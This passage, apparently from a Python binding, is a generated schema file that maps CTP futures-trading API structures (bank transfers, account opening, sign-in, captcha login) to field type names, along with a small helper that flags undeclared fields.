"LongExchMargin": "double",
"ShortExchMargin": "double",
"CloseProfit": "double",
"FrozenCommission": "double",
"Commission": "double",
"FrozenCash": "double",
"CashIn": "double",
"PositionProfit": "double",
"OffsetAmount": "double",
"LongOffsetAmount": "double",
"ShortOffsetAmount": "double",
"ExchOffsetAmount": "double",
"LongExchOffsetAmount": "double",
"ShortExchOffsetAmount": "double",
"HedgeFlag": "char",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcQueryCFMMCTradingAccountTokenField = {
"BrokerID": "string",
"InvestorID": "string",
"InvestUnitID": "string",
}
CThostFtdcCFMMCTradingAccountTokenField = {
"BrokerID": "string",
"ParticipantID": "string",
"AccountID": "string",
"KeyID": "int",
"Token": "string",
}
CThostFtdcQryProductGroupField = {
"ProductID": "string",
"ExchangeID": "string",
}
CThostFtdcProductGroupField = {
"ProductID": "string",
"ExchangeID": "string",
"ProductGroupID": "string",
}
CThostFtdcBulletinField = {
"ExchangeID": "string",
"TradingDay": "string",
"BulletinID": "int",
"SequenceNo": "int",
"NewsType": "string",
"NewsUrgency": "char",
"SendTime": "string",
"Abstract": "string",
"ComeFrom": "string",
"Content": "string",
"URLLink": "string",
"MarketID": "string",
}
CThostFtdcQryBulletinField = {
"ExchangeID": "string",
"BulletinID": "int",
"SequenceNo": "int",
"NewsType": "string",
"NewsUrgency": "char",
}
CThostFtdcReqOpenAccountField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"Gender": "char",
"CountryCode": "string",
"CustType": "char",
"Address": "string",
"ZipCode": "string",
"Telephone": "string",
"MobilePhone": "string",
"Fax": "string",
"EMail": "string",
"MoneyAccountStatus": "char",
"BankAccount": "string",
"BankPassWord": "string",
"AccountID": "string",
"Password": "string",
"InstallID": "int",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"CashExchangeCode": "char",
"Digest": "string",
"BankAccType": "char",
"DeviceID": "string",
"BankSecuAccType": "char",
"BrokerIDByBank": "string",
"BankSecuAcc": "string",
"BankPwdFlag": "char",
"SecuPwdFlag": "char",
"OperNo": "string",
"TID": "int",
"UserID": "string",
"LongCustomerName": "string",
}
CThostFtdcReqCancelAccountField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"Gender": "char",
"CountryCode": "string",
"CustType": "char",
"Address": "string",
"ZipCode": "string",
"Telephone": "string",
"MobilePhone": "string",
"Fax": "string",
"EMail": "string",
"MoneyAccountStatus": "char",
"BankAccount": "string",
"BankPassWord": "string",
"AccountID": "string",
"Password": "string",
"InstallID": "int",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"CashExchangeCode": "char",
"Digest": "string",
"BankAccType": "char",
"DeviceID": "string",
"BankSecuAccType": "char",
"BrokerIDByBank": "string",
"BankSecuAcc": "string",
"BankPwdFlag": "char",
"SecuPwdFlag": "char",
"OperNo": "string",
"TID": "int",
"UserID": "string",
"LongCustomerName": "string",
}
CThostFtdcReqChangeAccountField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"Gender": "char",
"CountryCode": "string",
"CustType": "char",
"Address": "string",
"ZipCode": "string",
"Telephone": "string",
"MobilePhone": "string",
"Fax": "string",
"EMail": "string",
"MoneyAccountStatus": "char",
"BankAccount": "string",
"BankPassWord": "string",
"NewBankAccount": "string",
"NewBankPassWord": "string",
"AccountID": "string",
"Password": "string",
"BankAccType": "char",
"InstallID": "int",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"BrokerIDByBank": "string",
"BankPwdFlag": "char",
"SecuPwdFlag": "char",
"TID": "int",
"Digest": "string",
"LongCustomerName": "string",
}
CThostFtdcReqTransferField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"CustType": "char",
"BankAccount": "string",
"BankPassWord": "string",
"AccountID": "string",
"Password": "string",
"InstallID": "int",
"FutureSerial": "int",
"UserID": "string",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"TradeAmount": "double",
"FutureFetchAmount": "double",
"FeePayFlag": "char",
"CustFee": "double",
"BrokerFee": "double",
"Message": "string",
"Digest": "string",
"BankAccType": "char",
"DeviceID": "string",
"BankSecuAccType": "char",
"BrokerIDByBank": "string",
"BankSecuAcc": "string",
"BankPwdFlag": "char",
"SecuPwdFlag": "char",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
"TransferStatus": "char",
"LongCustomerName": "string",
}
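# --- validation sketch (assumption) ---------------------------------------------
# Before sending a bank-transfer request it can be handy to check that a
# populated dict only carries fields the struct actually declares; the helper
# below is illustrative and not part of the generated data.
def unknown_fields(field_map, record):
    """Return the keys of `record` that are not declared in `field_map`."""
    return sorted(set(record) - set(field_map))

# Example: unknown_fields(CThostFtdcReqTransferField, {"TradeAmount": 100.0, "Foo": 1})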
CThostFtdcRspTransferField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"CustType": "char",
"BankAccount": "string",
"BankPassWord": "string",
"AccountID": "string",
"Password": "string",
"InstallID": "int",
"FutureSerial": "int",
"UserID": "string",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"TradeAmount": "double",
"FutureFetchAmount": "double",
"FeePayFlag": "char",
"CustFee": "double",
"BrokerFee": "double",
"Message": "string",
"Digest": "string",
"BankAccType": "char",
"DeviceID": "string",
"BankSecuAccType": "char",
"BrokerIDByBank": "string",
"BankSecuAcc": "string",
"BankPwdFlag": "char",
"SecuPwdFlag": "char",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
"TransferStatus": "char",
"ErrorID": "int",
"ErrorMsg": "string",
"LongCustomerName": "string",
}
CThostFtdcReqRepealField = {
"RepealTimeInterval": "int",
"RepealedTimes": "int",
"BankRepealFlag": "char",
"BrokerRepealFlag": "char",
"PlateRepealSerial": "int",
"BankRepealSerial": "string",
"FutureRepealSerial": "int",
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"CustType": "char",
"BankAccount": "string",
"BankPassWord": "string",
"AccountID": "string",
"Password": "string",
"InstallID": "int",
"FutureSerial": "int",
"UserID": "string",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"TradeAmount": "double",
"FutureFetchAmount": "double",
"FeePayFlag": "char",
"CustFee": "double",
"BrokerFee": "double",
"Message": "string",
"Digest": "string",
"BankAccType": "char",
"DeviceID": "string",
"BankSecuAccType": "char",
"BrokerIDByBank": "string",
"BankSecuAcc": "string",
"BankPwdFlag": "char",
"SecuPwdFlag": "char",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
"TransferStatus": "char",
"LongCustomerName": "string",
}
CThostFtdcRspRepealField = {
"RepealTimeInterval": "int",
"RepealedTimes": "int",
"BankRepealFlag": "char",
"BrokerRepealFlag": "char",
"PlateRepealSerial": "int",
"BankRepealSerial": "string",
"FutureRepealSerial": "int",
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"CustType": "char",
"BankAccount": "string",
"BankPassWord": "string",
"AccountID": "string",
"Password": "string",
"InstallID": "int",
"FutureSerial": "int",
"UserID": "string",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"TradeAmount": "double",
"FutureFetchAmount": "double",
"FeePayFlag": "char",
"CustFee": "double",
"BrokerFee": "double",
"Message": "string",
"Digest": "string",
"BankAccType": "char",
"DeviceID": "string",
"BankSecuAccType": "char",
"BrokerIDByBank": "string",
"BankSecuAcc": "string",
"BankPwdFlag": "char",
"SecuPwdFlag": "char",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
"TransferStatus": "char",
"ErrorID": "int",
"ErrorMsg": "string",
"LongCustomerName": "string",
}
CThostFtdcReqQueryAccountField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"CustType": "char",
"BankAccount": "string",
"BankPassWord": "string",
"AccountID": "string",
"Password": "string",
"FutureSerial": "int",
"InstallID": "int",
"UserID": "string",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"Digest": "string",
"BankAccType": "char",
"DeviceID": "string",
"BankSecuAccType": "char",
"BrokerIDByBank": "string",
"BankSecuAcc": "string",
"BankPwdFlag": "char",
"SecuPwdFlag": "char",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
"LongCustomerName": "string",
}
CThostFtdcRspQueryAccountField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"CustType": "char",
"BankAccount": "string",
"BankPassWord": "string",
"AccountID": "string",
"Password": "string",
"FutureSerial": "int",
"InstallID": "int",
"UserID": "string",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"Digest": "string",
"BankAccType": "char",
"DeviceID": "string",
"BankSecuAccType": "char",
"BrokerIDByBank": "string",
"BankSecuAcc": "string",
"BankPwdFlag": "char",
"SecuPwdFlag": "char",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
"BankUseAmount": "double",
"BankFetchAmount": "double",
"LongCustomerName": "string",
}
CThostFtdcFutureSignIOField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"InstallID": "int",
"UserID": "string",
"Digest": "string",
"CurrencyID": "string",
"DeviceID": "string",
"BrokerIDByBank": "string",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
}
CThostFtdcRspFutureSignInField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"InstallID": "int",
"UserID": "string",
"Digest": "string",
"CurrencyID": "string",
"DeviceID": "string",
"BrokerIDByBank": "string",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
"ErrorID": "int",
"ErrorMsg": "string",
"PinKey": "string",
"MacKey": "string",
}
CThostFtdcReqFutureSignOutField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"InstallID": "int",
"UserID": "string",
"Digest": "string",
"CurrencyID": "string",
"DeviceID": "string",
"BrokerIDByBank": "string",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
}
CThostFtdcRspFutureSignOutField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"InstallID": "int",
"UserID": "string",
"Digest": "string",
"CurrencyID": "string",
"DeviceID": "string",
"BrokerIDByBank": "string",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
"ErrorID": "int",
"ErrorMsg": "string",
}
CThostFtdcReqQueryTradeResultBySerialField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"Reference": "int",
"RefrenceIssureType": "char",
"RefrenceIssure": "string",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"CustType": "char",
"BankAccount": "string",
"BankPassWord": "string",
"AccountID": "string",
"Password": "string",
"CurrencyID": "string",
"TradeAmount": "double",
"Digest": "string",
"LongCustomerName": "string",
}
CThostFtdcRspQueryTradeResultBySerialField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"ErrorID": "int",
"ErrorMsg": "string",
"Reference": "int",
"RefrenceIssureType": "char",
"RefrenceIssure": "string",
"OriginReturnCode": "string",
"OriginDescrInfoForReturnCode": "string",
"BankAccount": "string",
"BankPassWord": "string",
"AccountID": "string",
"Password": "string",
"CurrencyID": "string",
"TradeAmount": "double",
"Digest": "string",
}
CThostFtdcReqDayEndFileReadyField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"FileBusinessCode": "char",
"Digest": "string",
}
CThostFtdcReturnResultField = {
"ReturnCode": "string",
"DescrInfoForReturnCode": "string",
}
CThostFtdcVerifyFuturePasswordField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"AccountID": "string",
"Password": "string",
"BankAccount": "string",
"BankPassWord": "string",
"InstallID": "int",
"TID": "int",
"CurrencyID": "string",
}
CThostFtdcVerifyCustInfoField = {
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"CustType": "char",
"LongCustomerName": "string",
}
CThostFtdcVerifyFuturePasswordAndCustInfoField = {
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"CustType": "char",
"AccountID": "string",
"Password": "string",
"CurrencyID": "string",
"LongCustomerName": "string",
}
CThostFtdcDepositResultInformField = {
"DepositSeqNo": "string",
"BrokerID": "string",
"InvestorID": "string",
"Deposit": "double",
"RequestID": "int",
"ReturnCode": "string",
"DescrInfoForReturnCode": "string",
}
CThostFtdcReqSyncKeyField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"InstallID": "int",
"UserID": "string",
"Message": "string",
"DeviceID": "string",
"BrokerIDByBank": "string",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
}
CThostFtdcRspSyncKeyField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"InstallID": "int",
"UserID": "string",
"Message": "string",
"DeviceID": "string",
"BrokerIDByBank": "string",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
"ErrorID": "int",
"ErrorMsg": "string",
}
CThostFtdcNotifyQueryAccountField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"CustType": "char",
"BankAccount": "string",
"BankPassWord": "string",
"AccountID": "string",
"Password": "string",
"FutureSerial": "int",
"InstallID": "int",
"UserID": "string",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"Digest": "string",
"BankAccType": "char",
"DeviceID": "string",
"BankSecuAccType": "char",
"BrokerIDByBank": "string",
"BankSecuAcc": "string",
"BankPwdFlag": "char",
"SecuPwdFlag": "char",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
"BankUseAmount": "double",
"BankFetchAmount": "double",
"ErrorID": "int",
"ErrorMsg": "string",
"LongCustomerName": "string",
}
CThostFtdcTransferSerialField = {
"PlateSerial": "int",
"TradeDate": "string",
"TradingDay": "string",
"TradeTime": "string",
"TradeCode": "string",
"SessionID": "int",
"BankID": "string",
"BankBranchID": "string",
"BankAccType": "char",
"BankAccount": "string",
"BankSerial": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"FutureAccType": "char",
"AccountID": "string",
"InvestorID": "string",
"FutureSerial": "int",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"CurrencyID": "string",
"TradeAmount": "double",
"CustFee": "double",
"BrokerFee": "double",
"AvailabilityFlag": "char",
"OperatorCode": "string",
"BankNewAccount": "string",
"ErrorID": "int",
"ErrorMsg": "string",
}
CThostFtdcQryTransferSerialField = {
"BrokerID": "string",
"AccountID": "string",
"BankID": "string",
"CurrencyID": "string",
}
CThostFtdcNotifyFutureSignInField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"InstallID": "int",
"UserID": "string",
"Digest": "string",
"CurrencyID": "string",
"DeviceID": "string",
"BrokerIDByBank": "string",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
"ErrorID": "int",
"ErrorMsg": "string",
"PinKey": "string",
"MacKey": "string",
}
CThostFtdcNotifyFutureSignOutField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"InstallID": "int",
"UserID": "string",
"Digest": "string",
"CurrencyID": "string",
"DeviceID": "string",
"BrokerIDByBank": "string",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
"ErrorID": "int",
"ErrorMsg": "string",
}
CThostFtdcNotifySyncKeyField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"InstallID": "int",
"UserID": "string",
"Message": "string",
"DeviceID": "string",
"BrokerIDByBank": "string",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
"ErrorID": "int",
"ErrorMsg": "string",
}
CThostFtdcQryAccountregisterField = {
"BrokerID": "string",
"AccountID": "string",
"BankID": "string",
"BankBranchID": "string",
"CurrencyID": "string",
}
CThostFtdcAccountregisterField = {
"TradeDay": "string",
"BankID": "string",
"BankBranchID": "string",
"BankAccount": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"AccountID": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"CustomerName": "string",
"CurrencyID": "string",
"OpenOrDestroy": "char",
"RegDate": "string",
"OutDate": "string",
"TID": "int",
"CustType": "char",
"BankAccType": "char",
"LongCustomerName": "string",
}
CThostFtdcOpenAccountField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"Gender": "char",
"CountryCode": "string",
"CustType": "char",
"Address": "string",
"ZipCode": "string",
"Telephone": "string",
"MobilePhone": "string",
"Fax": "string",
"EMail": "string",
"MoneyAccountStatus": "char",
"BankAccount": "string",
"BankPassWord": "string",
"AccountID": "string",
"Password": "string",
"InstallID": "int",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"CashExchangeCode": "char",
"Digest": "string",
"BankAccType": "char",
"DeviceID": "string",
"BankSecuAccType": "char",
"BrokerIDByBank": "string",
"BankSecuAcc": "string",
"BankPwdFlag": "char",
"SecuPwdFlag": "char",
"OperNo": "string",
"TID": "int",
"UserID": "string",
"ErrorID": "int",
"ErrorMsg": "string",
"LongCustomerName": "string",
}
CThostFtdcCancelAccountField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"Gender": "char",
"CountryCode": "string",
"CustType": "char",
"Address": "string",
"ZipCode": "string",
"Telephone": "string",
"MobilePhone": "string",
"Fax": "string",
"EMail": "string",
"MoneyAccountStatus": "char",
"BankAccount": "string",
"BankPassWord": "string",
"AccountID": "string",
"Password": "string",
"InstallID": "int",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"CashExchangeCode": "char",
"Digest": "string",
"BankAccType": "char",
"DeviceID": "string",
"BankSecuAccType": "char",
"BrokerIDByBank": "string",
"BankSecuAcc": "string",
"BankPwdFlag": "char",
"SecuPwdFlag": "char",
"OperNo": "string",
"TID": "int",
"UserID": "string",
"ErrorID": "int",
"ErrorMsg": "string",
"LongCustomerName": "string",
}
CThostFtdcChangeAccountField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"Gender": "char",
"CountryCode": "string",
"CustType": "char",
"Address": "string",
"ZipCode": "string",
"Telephone": "string",
"MobilePhone": "string",
"Fax": "string",
"EMail": "string",
"MoneyAccountStatus": "char",
"BankAccount": "string",
"BankPassWord": "string",
"NewBankAccount": "string",
"NewBankPassWord": "string",
"AccountID": "string",
"Password": "string",
"BankAccType": "char",
"InstallID": "int",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"BrokerIDByBank": "string",
"BankPwdFlag": "char",
"SecuPwdFlag": "char",
"TID": "int",
"Digest": "string",
"ErrorID": "int",
"ErrorMsg": "string",
"LongCustomerName": "string",
}
CThostFtdcSecAgentACIDMapField = {
"BrokerID": "string",
"UserID": "string",
"AccountID": "string",
"CurrencyID": "string",
"BrokerSecAgentID": "string",
}
CThostFtdcQrySecAgentACIDMapField = {
"BrokerID": "string",
"UserID": "string",
"AccountID": "string",
"CurrencyID": "string",
}
CThostFtdcUserRightsAssignField = {
"BrokerID": "string",
"UserID": "string",
"DRIdentityID": "int",
}
CThostFtdcBrokerUserRightAssignField = {
"BrokerID": "string",
"DRIdentityID": "int",
"Tradeable": "int",
}
CThostFtdcDRTransferField = {
"OrigDRIdentityID": "int",
"DestDRIdentityID": "int",
"OrigBrokerID": "string",
"DestBrokerID": "string",
}
CThostFtdcFensUserInfoField = {
"BrokerID": "string",
"UserID": "string",
"LoginMode": "char",
}
CThostFtdcCurrTransferIdentityField = {
"IdentityID": "int",
}
CThostFtdcLoginForbiddenUserField = {
"BrokerID": "string",
"UserID": "string",
"IPAddress": "string",
}
CThostFtdcQryLoginForbiddenUserField = {
"BrokerID": "string",
"UserID": "string",
}
CThostFtdcMulticastGroupInfoField = {
"GroupIP": "string",
"GroupPort": "int",
"SourceIP": "string",
}
CThostFtdcTradingAccountReserveField = {
"BrokerID": "string",
"AccountID": "string",
"Reserve": "double",
"CurrencyID": "string",
}
CThostFtdcQryLoginForbiddenIPField = {
"IPAddress": "string",
}
CThostFtdcQryIPListField = {
"IPAddress": "string",
}
CThostFtdcQryUserRightsAssignField = {
"BrokerID": "string",
"UserID": "string",
}
CThostFtdcReserveOpenAccountConfirmField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"Gender": "char",
"CountryCode": "string",
"CustType": "char",
"Address": "string",
"ZipCode": "string",
"Telephone": "string",
"MobilePhone": "string",
"Fax": "string",
"EMail": "string",
"MoneyAccountStatus": "char",
"BankAccount": "string",
"BankPassWord": "string",
"InstallID": "int",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"Digest": "string",
"BankAccType": "char",
"BrokerIDByBank": "string",
"TID": "int",
"AccountID": "string",
"Password": "string",
"BankReserveOpenSeq": "string",
"BookDate": "string",
"BookPsw": "string",
"ErrorID": "int",
"ErrorMsg": "string",
}
CThostFtdcReserveOpenAccountField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"Gender": "char",
"CountryCode": "string",
"CustType": "char",
"Address": "string",
"ZipCode": "string",
"Telephone": "string",
"MobilePhone": "string",
"Fax": "string",
"EMail": "string",
"MoneyAccountStatus": "char",
"BankAccount": "string",
"BankPassWord": "string",
"InstallID": "int",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"Digest": "string",
"BankAccType": "char",
"BrokerIDByBank": "string",
"TID": "int",
"ReserveOpenAccStas": "char",
"ErrorID": "int",
"ErrorMsg": "string",
}
CThostFtdcAccountPropertyField = {
"BrokerID": "string",
"AccountID": "string",
"BankID": "string",
"BankAccount": "string",
"OpenName": "string",
"OpenBank": "string",
"IsActive": "int",
"AccountSourceType": "char",
"OpenDate": "string",
"CancelDate": "string",
"OperatorID": "string",
"OperateDate": "string",
"OperateTime": "string",
"CurrencyID": "string",
}
CThostFtdcQryCurrDRIdentityField = {
"DRIdentityID": "int",
}
CThostFtdcCurrDRIdentityField = {
"DRIdentityID": "int",
}
CThostFtdcQrySecAgentCheckModeField = {
"BrokerID": "string",
"InvestorID": "string",
}
CThostFtdcQrySecAgentTradeInfoField = {
"BrokerID": "string",
"BrokerSecAgentID": "string",
}
CThostFtdcUserSystemInfoField = {
"BrokerID": "string",
"UserID": "string",
"ClientSystemInfoLen": "int",
"ClientSystemInfo": "string",
"ClientPublicIP": "string",
"ClientIPPort": "int",
"ClientLoginTime": "string",
"ClientAppID": "string",
}
CThostFtdcReqUserAuthMethodField = {
"TradingDay": "string",
"BrokerID": "string",
"UserID": "string",
}
CThostFtdcRspUserAuthMethodField = {
"UsableAuthMethod": "int",
}
CThostFtdcReqGenUserCaptchaField = {
"TradingDay": "string",
"BrokerID": "string",
"UserID": "string",
}
CThostFtdcRspGenUserCaptchaField = {
"BrokerID": "string",
"UserID": "string",
"CaptchaInfoLen": "int",
"CaptchaInfo": "string",
}
CThostFtdcReqGenUserTextField = {
"TradingDay": "string",
"BrokerID": "string",
"UserID": "string",
}
CThostFtdcRspGenUserTextField = {
"UserTextSeq": "int",
}
CThostFtdcReqUserLoginWithCaptchaField = {
"TradingDay": "string",
"BrokerID": "string",
"UserID": "string",
"Password": "string",
"UserProductInfo": "string",
"InterfaceProductInfo": "string",
"ProtocolInfo": "string",
"MacAddress": "string",
"ClientIPAddress": "string",
"LoginRemark": "string",
"Captcha": "string",
"ClientIPPort": "int",
}
